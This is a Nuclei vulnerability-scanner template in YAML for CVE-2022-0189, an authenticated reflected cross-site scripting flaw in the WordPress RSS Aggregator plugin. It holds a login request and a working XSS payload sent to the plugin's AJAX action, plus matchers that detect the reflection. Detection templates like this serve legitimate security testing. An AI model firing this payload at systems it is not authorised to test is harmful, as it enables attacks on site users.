nuclei-templates/http/cves/2022/CVE-2022-0189.yaml

64 lines
2.3 KiB
YAML

id: CVE-2022-0189
info:
name: WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.
remediation: |
Update WordPress RSS Aggregator plugin to version 4.20 or later to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/52a71bf1-b8bc-479e-b741-eb8fb9685014
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0189
- https://plugins.trac.wordpress.org/changeset/2659298
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0189
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.41099
cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: wprssaggregator
product: wp_rss_aggregator
framework: wordpress
tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src onerror=alert(`document.domain`)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100edc88f78650e74bc9003b0c2b066c318d5c58c26c54ec191ac0874574761b76102206106d2418f3d59d84a7a29f1342a986cfdb972da2c6aeacb6a1a2eec9e4e2ea9:922c64590222798bb761d5b6d8e72950